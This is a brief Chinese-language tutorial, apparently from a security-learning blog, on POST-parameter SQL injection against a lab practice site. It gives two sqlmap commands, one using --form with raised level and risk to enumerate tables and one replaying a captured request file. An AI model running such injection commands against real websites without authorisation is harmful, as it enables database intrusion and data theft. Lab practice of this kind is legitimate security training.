写在前面
POST注入和GET注入的区别主要在于传参的位置不同,前者在表单中,后者在url上,因此POST注入完全可以参考GET注入的手动注入方法得到字段的数据,今天介绍另外一种方法sqlmap工具的使用
靶场演示
方法1
–form表示获得表单中的传参
缺点:注出的数据有时候错误或者不完整
运行下面的语句得到注出的结果如下图所示
python sqlmap.py -u http://inject2b.lab.aqlab.cn/Pass-06/index.php --form --tables --level 3 --risk 2
方法2
通过-r命令结合抓取的数据包可以利用数据包中的cookie,适用面更广,法一不适合已经登录后的网站
python sqlmap.py -r post.txt --tables
sqlmap运行上面的语句同样也可以注出法一的结果